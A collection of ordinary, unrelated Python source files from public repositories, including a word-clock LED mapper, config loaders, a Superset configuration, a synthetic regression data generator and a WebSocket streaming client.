ace74ba230fe0cbc91752f2fa069b5b1562b6a3a | 10,877 | py | Python | clock.py | ThomasMoellerR/11_01_rpi_wordclock | cf58bd46eb5cfe6eaf79479176741e655064f2bf | [
"MIT"
] | null | null | null | clock.py | ThomasMoellerR/11_01_rpi_wordclock | cf58bd46eb5cfe6eaf79479176741e655064f2bf | [
"MIT"
] | null | null | null | clock.py | ThomasMoellerR/11_01_rpi_wordclock | cf58bd46eb5cfe6eaf79479176741e655064f2bf | [
"MIT"
] | null | null | null | import numpy as np
import colorsys
import random
def grad_to_rgb(grad):
color = colorsys.hsv_to_rgb(grad/360, 1.0, 1.0)
color = np.asarray(color)
color *= 255
r = color[0]
g = color[1]
b = color[2]
return r,g,b
class wordclock:
wordidx = {}
wordidx["es"] = (0,1)
wordidx["ist"] = (3,4,5)
wordidx["funf"] = (7,8,9,10)
wordidx["zehn"] = (11,12,13,14)
wordidx["zwanzig"] = (15,16,17,18,19,20,21)
wordidx["drei"] = (22,23,24,25)
wordidx["viertel"] = (26,27,28,29,30,31,32)
wordidx["nach"] = (35,36,37,38)
wordidx["vor"] = (39,40,41)
wordidx["halb"] = (44,45,46,47)
wordidx["zwolf"] = (49,50,51,52,53)
wordidx["zw"] = (55,56)
wordidx["ei"] = (57,58)
wordidx["n"] = (59,)
wordidx["s"] = (60,)
wordidx["ieben"] = (61,62,63,64,65)
wordidx["drei_2"] = (67,68,69,70)
wordidx["funf_2"] = (73,74,75,76)
wordidx["elf"] = (77,78,79)
wordidx["neun"] = (80,81,82,83)
wordidx["vier"] = (84,85,86,87)
wordidx["acht"] = (89,90,91,92)
wordidx["zehn_2"] = (93,94,95,96)
wordidx["sechs"] = (100,101,102,103,104)
wordidx["uhr"] = (107,108,109)
wordidx["1min"] = (113,)
wordidx["2min"] = (110,)
wordidx["3min"] = (111,)
wordidx["4min"] = (112,)
def __init__(self):
self.mode = "WORD_RANDOM_COLOR"
self.brightness = 1.0
self.uniquewords_pixelmap = np.zeros((114), dtype=np.uint8)
self.rgb_pixelmap = np.zeros((114,3), dtype=np.uint8)
self.rgb_brightness_pixelmap = np.zeros((114,3), dtype=np.uint8)
self.fixed_color = (0,255,0)
def no_time_availabe(self):
self.rgb_brightness_pixelmap = np.zeros((114,3), dtype=np.uint8)
#color = (255,255,255)
#self.rgb_brightness_pixelmap[110] = color
#self.rgb_brightness_pixelmap[111] = color
#self.rgb_brightness_pixelmap[112] = color
#self.rgb_brightness_pixelmap[113] = color
def get_pixelmap(self):
return self.rgb_brightness_pixelmap.tolist()
def set_color (self, color):
self.fixed_color = color
def set_mode(self, mode):
self.mode = mode
def set_brightness(self, brightness):
self.brightness = brightness
self.fill_rgb_brightness_pixelmap()
def set_time(self, hours, minutes):
if self.mode == "SAME_COLOR" or self.mode == "WORD_RANDOM_COLOR" or self.mode == "CHARACTER_RANDOM_COLOR":
self.calcualte_uniquewords_pixelmap(hours, minutes)
def update(self):
self.fill_rgb_pixelmap()
self.fill_rgb_brightness_pixelmap()
def fill_rgb_pixelmap(self):
if self.mode == "SAME_COLOR" or self.mode == "WORD_RANDOM_COLOR" or self.mode == "CHARACTER_RANDOM_COLOR":
self.rgb_pixelmap = np.zeros((114,3), dtype=np.uint8)
for i in np.trim_zeros(np.unique(self.uniquewords_pixelmap)):
for j in np.where(self.uniquewords_pixelmap == i):
if self.mode == "SAME_COLOR":
for k in j:
self.rgb_pixelmap[k] = self.fixed_color
if self.mode == "WORD_RANDOM_COLOR":
grad = random.choice(np.arange(0,360,1))
r,g,b = grad_to_rgb(grad)
for k in j:
self.rgb_pixelmap[k] = (r,g,b)
if self.mode == "CHARACTER_RANDOM_COLOR":
for k in j:
grad = random.choice(np.arange(0,360,1))
r,g,b = grad_to_rgb(grad)
self.rgb_pixelmap[k] = (r,g,b)
if self.mode == "TEST":
for i in range(len(self.rgb_pixelmap)):
self.uniquewords_pixelmap[i] = 1 # ungleich null
self.rgb_pixelmap[i] = self.fixed_color
def fill_rgb_brightness_pixelmap(self):
self.rgb_brightness_pixelmap = np.zeros((114,3), dtype=np.uint8)
for i in range(len(self.uniquewords_pixelmap)):
if self.uniquewords_pixelmap[i] != 0:
h,s,v = colorsys.rgb_to_hsv(self.rgb_pixelmap[i][0] / 255, self.rgb_pixelmap[i][1] / 255, self.rgb_pixelmap[i][2] / 255)
v = self.brightness
r,g,b = colorsys.hsv_to_rgb(h,s,v)
self.rgb_brightness_pixelmap[i][0] = r * 255
self.rgb_brightness_pixelmap[i][1] = g * 255
self.rgb_brightness_pixelmap[i][2] = b * 255
def set_pixel(self, words, increase_counter):
if increase_counter: self.uncounter += 1
for i in words: self.uniquewords_pixelmap[i] = self.uncounter
def calcualte_uniquewords_pixelmap(self, hours, minutes):
self.uniquewords_pixelmap = np.zeros((114), dtype=np.uint8)
self.uncounter = 0
# Immer
self.set_pixel(wordclock.wordidx["es"], 1)
self.set_pixel(wordclock.wordidx["ist"], 1)
self.set_pixel(wordclock.wordidx["uhr"], 1)
# Stunden
if hours == 0 or hours == 12 or hours == 24:
if minutes < 25:
self.set_pixel(wordclock.wordidx["zwolf"], 1)
else:
self.set_pixel(wordclock.wordidx["ei"], 1)
self.set_pixel(wordclock.wordidx["n"], 0)
self.set_pixel(wordclock.wordidx["s"], 0)
if hours == 1 or hours == 13:
if minutes < 25:
self.set_pixel(wordclock.wordidx["ei"], 1)
self.set_pixel(wordclock.wordidx["n"], 0)
self.set_pixel(wordclock.wordidx["s"], 0)
else:
self.set_pixel(wordclock.wordidx["zw"], 1)
self.set_pixel(wordclock.wordidx["ei"], 0)
if hours == 2 or hours == 14:
if minutes < 25:
self.set_pixel(wordclock.wordidx["zw"], 1)
self.set_pixel(wordclock.wordidx["ei"], 0)
else:
self.set_pixel(wordclock.wordidx["drei_2"], 1)
if hours == 3 or hours == 15:
if minutes < 25:
self.set_pixel(wordclock.wordidx["drei_2"], 1)
else:
self.set_pixel(wordclock.wordidx["vier"], 1)
if hours == 4 or hours == 16:
if minutes < 25:
self.set_pixel(wordclock.wordidx["vier"], 1)
else:
self.set_pixel(wordclock.wordidx["funf_2"], 1)
if hours == 5 or hours == 17:
if minutes < 25:
self.set_pixel(wordclock.wordidx["funf_2"], 1)
else:
self.set_pixel(wordclock.wordidx["sechs"], 1)
if hours == 6 or hours == 18:
if minutes < 25:
self.set_pixel(wordclock.wordidx["sechs"], 1)
else:
self.set_pixel(wordclock.wordidx["s"], 1)
self.set_pixel(wordclock.wordidx["ieben"], 0)
if hours == 7 or hours == 19:
if minutes < 25:
self.set_pixel(wordclock.wordidx["s"], 1)
self.set_pixel(wordclock.wordidx["ieben"], 0)
else:
self.set_pixel(wordclock.wordidx["acht"], 1)
if hours == 8 or hours == 20:
if minutes < 25:
self.set_pixel(wordclock.wordidx["acht"], 1)
else:
self.set_pixel(wordclock.wordidx["neun"], 1)
if hours == 9 or hours == 21:
if minutes < 25:
self.set_pixel(wordclock.wordidx["neun"], 1)
else:
self.set_pixel(wordclock.wordidx["zehn_2"], 1)
if hours == 10 or hours == 22:
if minutes < 25:
self.set_pixel(wordclock.wordidx["zehn_2"], 1)
else:
self.set_pixel(wordclock.wordidx["elf"], 1)
if hours == 11 or hours == 23:
if minutes < 25:
self.set_pixel(wordclock.wordidx["elf"], 1)
else:
self.set_pixel(wordclock.wordidx["zwolf"], 1)
# 5 Mintuen Schritte
if minutes >= 0 and minutes <= 4:
pass
if minutes >= 5 and minutes <= 9:
self.set_pixel(wordclock.wordidx["funf"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
if minutes >= 10 and minutes <= 14:
self.set_pixel(wordclock.wordidx["zehn"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
if minutes >= 15 and minutes <= 19:
self.set_pixel(wordclock.wordidx["viertel"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
if minutes >= 20 and minutes <= 24:
self.set_pixel(wordclock.wordidx["zwanzig"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
if minutes >= 25 and minutes <= 29:
self.set_pixel(wordclock.wordidx["funf"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
self.set_pixel(wordclock.wordidx["halb"], 1)
if minutes >= 30 and minutes <= 34:
self.set_pixel(wordclock.wordidx["halb"], 1)
if minutes >= 35 and minutes <= 39:
self.set_pixel(wordclock.wordidx["funf"], 1)
self.set_pixel(wordclock.wordidx["nach"], 1)
self.set_pixel(wordclock.wordidx["halb"], 1)
if minutes >= 40 and minutes <= 44:
self.set_pixel(wordclock.wordidx["zwanzig"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
if minutes >= 45 and minutes <= 49:
self.set_pixel(wordclock.wordidx["viertel"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
if minutes >= 50 and minutes <= 54:
self.set_pixel(wordclock.wordidx["zehn"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
if minutes >= 55 and minutes <= 59:
self.set_pixel(wordclock.wordidx["funf"], 1)
self.set_pixel(wordclock.wordidx["vor"], 1)
# Minuten
for j in range(1,60,5):
if minutes == j:
self.set_pixel(wordclock.wordidx["1min"], 1)
break
for j in range(2,60,5):
if minutes == j:
self.set_pixel(wordclock.wordidx["1min"], 1)
self.set_pixel(wordclock.wordidx["2min"], 1)
break
for j in range(3,60,5):
if minutes == j:
self.set_pixel(wordclock.wordidx["1min"], 1)
self.set_pixel(wordclock.wordidx["2min"], 1)
self.set_pixel(wordclock.wordidx["3min"], 1)
break
for j in range(4,60,5):
if minutes == j:
self.set_pixel(wordclock.wordidx["1min"], 1)
self.set_pixel(wordclock.wordidx["2min"], 1)
self.set_pixel(wordclock.wordidx["3min"], 1)
self.set_pixel(wordclock.wordidx["4min"], 1)
break
| 35.662295 | 136 | 0.542153 |
ace74d8f44224fba300f1408e5faf94ab7c3e34e | 3,918 | py | Python | common/config.py | eyextent/airCombateRL | 6b347a5abeef42a30b049de367e6c82403f1b7d2 | [
"MIT"
] | 9 | 2019-11-25T11:19:02.000Z | 2021-10-20T12:23:11.000Z | common/config.py | hedingjie/AirCombateRL | 6b347a5abeef42a30b049de367e6c82403f1b7d2 | [
"MIT"
] | 2 | 2020-11-02T07:06:03.000Z | 2021-01-18T03:51:30.000Z | common/config.py | hedingjie/AirCombateRL | 6b347a5abeef42a30b049de367e6c82403f1b7d2 | [
"MIT"
] | 11 | 2019-11-28T14:04:29.000Z | 2022-03-30T09:04:41.000Z | import numpy as np
import yaml
from easydict import EasyDict as edict
import os
import argparse
import datetime
from common.utlis import judge_type
import pprint
from sacred.observers import FileStorageObserver
base_dir = os.path.dirname(os.path.dirname(__file__))
#print(base_dir)
dict = edict()
def cfg_from_file(subfolder,filename):
if filename=='None':
return
with open(os.path.join(base_dir,"argument",subfolder,"{}.yaml".format(filename)),'r',encoding='utf-8') as f:
yaml_cfg = edict(yaml.load(f,Loader=yaml.FullLoader))
return yaml_cfg
def merge(param):
for key,value in param.items():
if param[key]=='None':
continue
else:
dict.update(cfg_from_file(key,value))
# print(dict)
return dict
def args_wrapper_parser(args):
'''
将字典形式的参数解析到 argparse 中,方便命令行传参
'''
parser = argparse.ArgumentParser()
for key, value in args.items():
tp = judge_type(value)
if tp == 'list':
eval("parser.add_argument('--%s', default='%s')"%(key, value))
else:
eval("parser.add_argument('--%s', type=%s, default='%s')"%(key, tp, value))
args = parser.parse_args()
return args
def args_wrapper_path(args, last_path):
'''
主要是对重复训练的保存路径进行封装
'''
# data_path_suffix_date = datetime.datetime.now().strftime('_%Y-%m-%d')
if last_path is None:
# args.save_path = args.source_path + '/' + args.experiment_name + data_path_suffix_date + '/'
args.save_path = args.source_path + '/' + args.experiment_name
# 判断日期文件夹是否建立
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
# file_size = len(os.listdir(args.save_path))
# args.save_path = args.save_path + str(file_size + 1)
# os.makedirs(args.save_path)
else:
args.save_path = last_path
return args
# 在当次实验的记录文件下创建配置文件中checkpoint_folder的文件夹
def args_wrapper_checkpoint_folder(args, file_number):
# 创建一个txt文本 记录此次存放结果的路径
txt_path = args.save_path + "/\.result_path.txt"
file = open(txt_path, 'w')
file_list = os.listdir(args.save_path)
# 根据文件夹的时间降序排列
# file_list.sort(key=lambda fn: os.path.getmtime(args.save_path + "/" + fn), reverse=True)
args.save_path = args.save_path + "/" +str(file_number)
path = args.save_path + "/" + args.checkpoint_folder_name
os.makedirs(path)
file.write(args.save_path)
def add_ex_config_obs(ex, args, result_path):
if args.flag_is_train: # 如果是训练则创建观察者(存放结果的文件)
ex.observers.append(FileStorageObserver.create(args.save_path))
ex.add_config({"config": args})
else:
if result_path is None:
file = open(args.save_path + "\.result_path.txt", "w+")
path = file.read()
args.save_path = path
else:
args.save_path = args.save_path + "/" + str(result_path)
# args.save_path = args.source_path + '/' + args.experiment_name + '/'
# if not os.path.exists(args.save_path):
# os.makedirs(args.save_path)
# return args
# def cfg_from_file(filename,subfolder):
# if subfolder==None:
# with open(os.path.join(base_dir, "config","{}.yaml".format(filename)), 'r', encoding='utf-8') as f:
# yaml_cfg = edict(yaml.load(f, Loader=yaml.FullLoader))
# else:
# with open(os.path.join(base_dir,"config",subfolder,"{}.yaml".format(filename)),'r',encoding='utf-8') as f:
# yaml_cfg = edict(yaml.load(f,Loader=yaml.FullLoader))
#
# return yaml_cfg
#合并操作,以‘/’为分隔符进行分割文件夹和文件名
# def merge(param):
# for key in param:
# if key.find('/')==-1:
# dict[key]=cfg_from_file(key,None)
# else:
# print(key.split('/')[0])
# print(key.split('/')[1])
# dict[key.split('/')[1]]=cfg_from_file(key.split('/')[1],key.split('/')[0])
# return dict
| 30.372093 | 116 | 0.627361 |
ace74f2d7f3fe46af234da4da3d50af3676e50f6 | 861 | py | Python | betfairlightweight/compat.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | 1 | 2020-04-15T22:17:26.000Z | 2020-04-15T22:17:26.000Z | betfairlightweight/compat.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | null | null | null | betfairlightweight/compat.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | 1 | 2021-04-26T14:47:28.000Z | 2021-04-26T14:47:28.000Z | import sys
import datetime
_ver = sys.version_info
#: Python 2.x?
is_py2 = (_ver[0] == 2)
#: Python 3.x?
is_py3 = (_ver[0] == 3)
try:
from builtins import FileNotFoundError
except ImportError:
class FileNotFoundError(OSError):
pass
if is_py2:
basestring = basestring
numeric_types = (int, long, float)
integer_types = (int, long)
elif is_py3:
basestring = (str, bytes)
numeric_types = (int, float)
integer_types = (int,)
# will attempt to use c libraries if installed
try:
import ujson as json
except ImportError:
import json
try:
import ciso8601
def parse_datetime(datetime_string):
return ciso8601.parse_datetime_unaware(datetime_string)
except ImportError:
def parse_datetime(datetime_string):
return datetime.datetime.strptime(datetime_string, "%Y-%m-%dT%H:%M:%S.%fZ")
| 19.133333 | 83 | 0.691057 |
ace7503c7edd9fa8cca99bc872df08edabb0faa5 | 2,292 | py | Python | contrib/docker/superset_config.py | franksam007/incubator-superset | a0f572eb3ea4b89cb435a8af20436f8e1d34814e | [
"Apache-2.0"
] | 108 | 2018-01-22T11:09:59.000Z | 2021-01-15T10:53:04.000Z | contrib/docker/superset_config.py | Odirlei-Stein/incubator-superset | 52afc33b31475536b287b56d262b9eaa32f479ab | [
"Apache-2.0"
] | 112 | 2018-01-25T22:57:21.000Z | 2019-08-22T20:08:48.000Z | contrib/docker/superset_config.py | Odirlei-Stein/incubator-superset | 52afc33b31475536b287b56d262b9eaa32f479ab | [
"Apache-2.0"
] | 24 | 2018-01-19T22:54:39.000Z | 2020-11-12T13:04:25.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
def get_env_variable(var_name, default=None):
"""Get the environment variable or raise exception."""
try:
return os.environ[var_name]
except KeyError:
if default is not None:
return default
else:
error_msg = 'The environment variable {} was missing, abort...'\
.format(var_name)
raise EnvironmentError(error_msg)
POSTGRES_USER = get_env_variable('POSTGRES_USER')
POSTGRES_PASSWORD = get_env_variable('POSTGRES_PASSWORD')
POSTGRES_HOST = get_env_variable('POSTGRES_HOST')
POSTGRES_PORT = get_env_variable('POSTGRES_PORT')
POSTGRES_DB = get_env_variable('POSTGRES_DB')
# The SQLAlchemy connection string.
SQLALCHEMY_DATABASE_URI = 'postgresql://%s:%s@%s:%s/%s' % (POSTGRES_USER,
POSTGRES_PASSWORD,
POSTGRES_HOST,
POSTGRES_PORT,
POSTGRES_DB)
REDIS_HOST = get_env_variable('REDIS_HOST')
REDIS_PORT = get_env_variable('REDIS_PORT')
class CeleryConfig(object):
BROKER_URL = 'redis://%s:%s/0' % (REDIS_HOST, REDIS_PORT)
CELERY_IMPORTS = ('superset.sql_lab', )
CELERY_RESULT_BACKEND = 'redis://%s:%s/1' % (REDIS_HOST, REDIS_PORT)
CELERY_ANNOTATIONS = {'tasks.add': {'rate_limit': '10/s'}}
CELERY_TASK_PROTOCOL = 1
CELERY_CONFIG = CeleryConfig
| 38.847458 | 77 | 0.655759 |
ace751b41871714c9503ba6f26adce284b7a86b1 | 1,476 | py | Python | setup.py | doncazzo/super_fernet | 9d00dbbbe5dcef43a7b8e883a333f0e430f0f21c | [
"MIT"
] | null | null | null | setup.py | doncazzo/super_fernet | 9d00dbbbe5dcef43a7b8e883a333f0e430f0f21c | [
"MIT"
] | null | null | null | setup.py | doncazzo/super_fernet | 9d00dbbbe5dcef43a7b8e883a333f0e430f0f21c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = ['Click>=7.0', ]
test_requirements = ['pytest>=3', ]
setup(
author="armando contreras",
author_email='doncazzo@outlook.it',
python_requires='>=3.6',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
description="python library that containst all the posible ways to use fernet cryptograhpy symmetric encryption",
entry_points={
'console_scripts': [
'super_fernet=super_fernet.cli:main',
],
},
install_requires=requirements,
license="MIT license",
long_description=readme + '\n\n' + history,
include_package_data=True,
keywords='super_fernet',
name='super_fernet',
packages=find_packages(include=['super_fernet', 'super_fernet.*']),
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/doncazzo/super_fernet',
version='0.1.0',
zip_safe=False,
)
| 29.52 | 117 | 0.647696 |
ace7521a614471ae4e9e5554314e63e9e1289b86 | 1,397 | py | Python | mtcompono/templatetags/mtcompono_tags.py | benoitc/mt-compono | 05a334fbd0084f9650fa6c86b9252c4754f6405a | [
"Apache-2.0"
] | 1 | 2020-01-21T11:12:18.000Z | 2020-01-21T11:12:18.000Z | mtcompono/templatetags/mtcompono_tags.py | benoitc/mt-compono | 05a334fbd0084f9650fa6c86b9252c4754f6405a | [
"Apache-2.0"
] | null | null | null | mtcompono/templatetags/mtcompono_tags.py | benoitc/mt-compono | 05a334fbd0084f9650fa6c86b9252c4754f6405a | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of compono released under the Apache 2 license.
# See the NOTICE for more information.
from django.conf import Settings
from django.template import Library, Node, Template, TemplateSyntaxError
from mtcompono.models import Page, Type
register = Library()
class ListTypeNode(Node):
def __init__(self, type_name):
self.type_name = type_name
def render(self, context):
t = Type.by_name(self.type_name)
if not t:
if settings.DEBUG:
return _("[%s n'existe pas]" % self.type_name)
else:
return ''
items = Page.by_type(t._id)
output = ''
try:
tpl = Template(t.templates['list'])
context.update({"items": items})
output = tpl.render(context)
except TemplateSyntaxError, e:
if settings.DEBUG:
return _("[Erreurs de syntaxe: %s]" % e)
else:
return ''
return output
def list_type(parser, token):
bits = token.contents.split()
if len(bits) < 2:
raise TemplateSyntaxError(_("'list_type' tag nécessite au moins un"
" argument: le nom du type"))
return ListTypeNode(bits[1])
list_type = register.tag(list_type)
| 29.723404 | 99 | 0.553329 |
ace7537a26cd91ed5e297a990e77c412c3355bf0 | 7,105 | py | Python | src/data/income_weather_data_generator.py | Dzirik/ds_ml_template | b9c63ea5836c478ec7a88a1bf5a8129c29d92b3a | [
"MIT"
] | null | null | null | src/data/income_weather_data_generator.py | Dzirik/ds_ml_template | b9c63ea5836c478ec7a88a1bf5a8129c29d92b3a | [
"MIT"
] | null | null | null | src/data/income_weather_data_generator.py | Dzirik/ds_ml_template | b9c63ea5836c478ec7a88a1bf5a8129c29d92b3a | [
"MIT"
] | null | null | null | """
Data Generator
File for generating regression _data simulating income based on the date and weather.
The documentation can be found in notebook/documentation/income_weather_data_generator_documentation.py.
"""
from datetime import datetime, timedelta
from typing import List, Union, Tuple, Any
from numpy import random, array, ndarray, dtype
from numpy import sum as summation
from pandas import DataFrame, get_dummies
from src.transformations.time_series_windows import TimeSeriesWindowsNumpy
ATTR_DATE = "DATE"
ATTR_DAY_OF_WEEK_NUM = "DAY_OF_WEEK_NUM"
ATTR_WEEK_NUM = "WEEK_NUM"
ATTR_WEATHER = "WEATHER"
ATTR_TEMPERATURE = "TEMPERATURE"
ATTR_RANDOM = "RANDOM"
ATTR_OUTPUT = "OUTPUT"
WEATHER_TYPES = ["sun", "rain", "wind", "cloud"]
# pylint: disable=invalid-name
# pylint: disable=too-many-instance-attributes
class IncomeWeatherDataGenerator:
"""
Class for generating the _data.
"""
def __init__(self) -> None:
self._time_series_window_transformer = TimeSeriesWindowsNumpy()
self._n: int
self._data = DataFrame()
self._data_transformed = DataFrame()
self._X_multi: ndarray[Any, dtype[Any]]
self._Y_multi: ndarray[Any, dtype[Any]]
self._seed = 39206
self._weights_multi: ndarray[Any, dtype[Any]]
def set_seed(self, seed_number: int) -> None:
"""
Sets _seed number.
:param seed_number: int. New _seed
"""
self._seed = seed_number
def _create_dates(self, start_date: str) -> None:
"""
Creates three columns with the date, day of the week number and week number of each observations.
:param start_date: str. Starting date of the observations.
"""
start_date_datetime = datetime.strptime(start_date, "%Y-%m-%d")
end_date_datetime = start_date_datetime + timedelta(days=self._n - 1)
delta = timedelta(days=1)
d = start_date_datetime
dates = []
while d <= end_date_datetime:
dates.append(d)
d += delta
self._data[ATTR_DATE] = dates
self._data[ATTR_DAY_OF_WEEK_NUM] = [int(d.strftime("%w")) for d in dates]
self._data[ATTR_WEEK_NUM] = [int(d.strftime("%V")) for d in dates]
def _create_categorical(self) -> None:
"""
Creates a column with a random values chosen from the list of strings WEATHER_TYPES.
"""
self._data[ATTR_WEATHER] = random.choice(WEATHER_TYPES, self._n, replace=True)
def _create_temperature(self) -> None:
"""
Creates a column with a random value.
"""
self._data[ATTR_TEMPERATURE] = random.uniform(10, 35, self._n)
def _create_random(self) -> None:
"""
Creates a column with a random value.
"""
self._data[ATTR_RANDOM] = random.randn(self._n) * 10
def save_as_csv(self) -> None:
"""
Saves the _data as a CSV file.
"""
self._data.to_csv("_data.csv", index=False)
def get_weights_multi(self) -> ndarray[Any, dtype[Any]]:
"""
Returns the weights used in multi dimensional example.
:return: ndarray[Any, dtype[Any]].
"""
return self._weights_multi
def get_attributes_names_multi(self) -> List[str]:
"""
Returns the names of attributes in multi dimensional example.
:return: List[str]. List of attribute name.
"""
return list(self._data_transformed.columns)[0:13]
def _create_multi_dim(self, input_window_len: int = 20) -> None:
"""
Creates multidimensional regression.
:param input_window_length: int.
"""
df = self._data_transformed.copy()
df.drop(columns=["OUTPUT"], inplace=True)
# I need only X, Y is calculated as another list.
self._X_multi, _ = self._time_series_window_transformer.fit_predict(
data=df.to_numpy(), input_window_len=input_window_len, output_window_len=0, shift=1
)
self._weights_multi = random.randint(low=-20, high=100, size=self._X_multi[0, :, :].shape)
# self._Y_multi = [nan] * (self._X_multi[0].shape[0] - 1)
list_pom = []
for i in range(self._X_multi.shape[0]):
Z = self._X_multi[i, :, :] * self._weights_multi
list_pom.append(Z.sum())
n = len(list_pom)
self._Y_multi = array(list_pom)
self._Y_multi = self._Y_multi.reshape((n, 1))
def generate(self, start_date: str, betas: List[Union[int, float]], n: int = 100, sigma: int = 10,
input_window_len: int = 20) -> Tuple[DataFrame, DataFrame, ndarray[Any, dtype[Any]], \
ndarray[Any, dtype[Any]]]:
"""
Creates the _data set which includes an output column comprised by the output of a linear regression.
:param start_date: str. Starting date of the observations.
:param betas: List[Union[int, float]]. List of coefficients for attributes for transformed _data frame of length
12.
['TEMPERATURE', 'DAY_OF_WEEK_NUM_0', 'DAY_OF_WEEK_NUM_1',
'DAY_OF_WEEK_NUM_2', 'DAY_OF_WEEK_NUM_3', 'DAY_OF_WEEK_NUM_4',
'DAY_OF_WEEK_NUM_5', 'DAY_OF_WEEK_NUM_6', 'WEATHER_cloud',
'WEATHER_rain', 'WEATHER_sun', 'WEATHER_wind']
Example: [30.1, 2, 1, 4, 3, 6, -1, -3, 0, -10, 25, 10]
:param n: int. Number of days to be generated.
:param sigma: Union[int, float]. Intercept coefficient.
:param input_window_len: int. Lenght of the historical data backwards for creating multidimensional
regression.
:return: Tuple[DataFrame, DataFrame, List[ndarray[Any, dtype[Any]]], List[ndarray[Any, dtype[Any]]]].
Non-tranformed _data frame, transformed _data frame, array of multi dimensional regression X and Y.
"""
self._n = n
# generate columns
random.seed(self._seed)
self._create_dates(start_date)
self._create_categorical()
self._create_temperature()
self._create_random()
# transform and compute regression output
self._data_transformed = get_dummies(data=self._data[["TEMPERATURE", "DAY_OF_WEEK_NUM", "WEATHER"]], # _data
columns=["DAY_OF_WEEK_NUM", "WEATHER"]) # to be encoded/transformed
self._data[ATTR_OUTPUT] = summation(self._data_transformed.values * betas, axis=1) + random.randn(n) * sigma
# delete unused columns in non-transformed _data frame
del self._data[ATTR_DAY_OF_WEEK_NUM]
del self._data[ATTR_WEEK_NUM]
# add missing columns to transformed
self._data_transformed[ATTR_RANDOM] = self._data[ATTR_RANDOM]
self._data_transformed[ATTR_OUTPUT] = self._data[ATTR_OUTPUT]
# create multi data
self._create_multi_dim(input_window_len)
return self._data, self._data_transformed, self._X_multi, self._Y_multi
# pylint: enable=invalid-name
# pylint: enable=too-many-instance-attributes
| 40.6 | 120 | 0.640535 |
ace75460f57898868d556ec2c3cc208bf642c179 | 3,146 | py | Python | examples/websocket/streaming/streaming_producer_client.py | rapyuta-robotics/autobahn_rce | 3916768cbf694417f1cf3927ebd343b460a09d73 | [
"Apache-2.0"
] | null | null | null | examples/websocket/streaming/streaming_producer_client.py | rapyuta-robotics/autobahn_rce | 3916768cbf694417f1cf3927ebd343b460a09d73 | [
"Apache-2.0"
] | null | null | null | examples/websocket/streaming/streaming_producer_client.py | rapyuta-robotics/autobahn_rce | 3916768cbf694417f1cf3927ebd343b460a09d73 | [
"Apache-2.0"
] | 1 | 2016-05-05T18:27:33.000Z | 2016-05-05T18:27:33.000Z | ###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from ranstring import randomByteString
from zope.interface import implements
from twisted.internet import reactor, interfaces
from autobahn.websocket import WebSocketProtocol, \
WebSocketClientFactory, \
WebSocketClientProtocol, \
connectWS
# 2^63 - This is the maximum imposed by the WS protocol
FRAME_SIZE = 0x7FFFFFFFFFFFFFFF
class RandomByteStreamProducer:
"""
A Twisted Push Producer generating a stream of random octets sending out data
in a WebSockets message frame.
"""
implements(interfaces.IPushProducer)
def __init__(self, proto):
self.proto = proto
self.started = False
self.paused = False
def pauseProducing(self):
self.paused = True
def resumeProducing(self):
self.paused = False
if not self.started:
self.proto.beginMessage(opcode = WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.proto.beginMessageFrame(FRAME_SIZE)
self.started = True
while not self.paused:
data = randomByteString(1024)
if self.proto.sendMessageFrameData(data) <= 0:
self.proto.beginMessageFrame(FRAME_SIZE)
print "new frame started!"
def stopProducing(self):
pass
class StreamingProducerHashClientProtocol(WebSocketClientProtocol):
"""
Streaming WebSockets client that generates stream of random octets
sent to streaming WebSockets server, which computes a running SHA-256,
which it will send every BATCH_SIZE octets back to us. This example
uses a Twisted producer to produce the byte stream as fast as the
receiver can consume, but not faster. Therefor, we don't need the
application-level flow control as with the other examples.
"""
def onOpen(self):
self.count = 0
producer = RandomByteStreamProducer(self)
self.registerProducer(producer, True)
producer.resumeProducing()
def onMessage(self, message, binary):
print "Digest for batch %d computed by server: %s" % (self.count, message)
self.count += 1
if __name__ == '__main__':
factory = WebSocketClientFactory("ws://localhost:9000")
factory.protocol = StreamingProducerHashClientProtocol
connectWS(factory)
reactor.run()
| 34.571429 | 81 | 0.643675 |
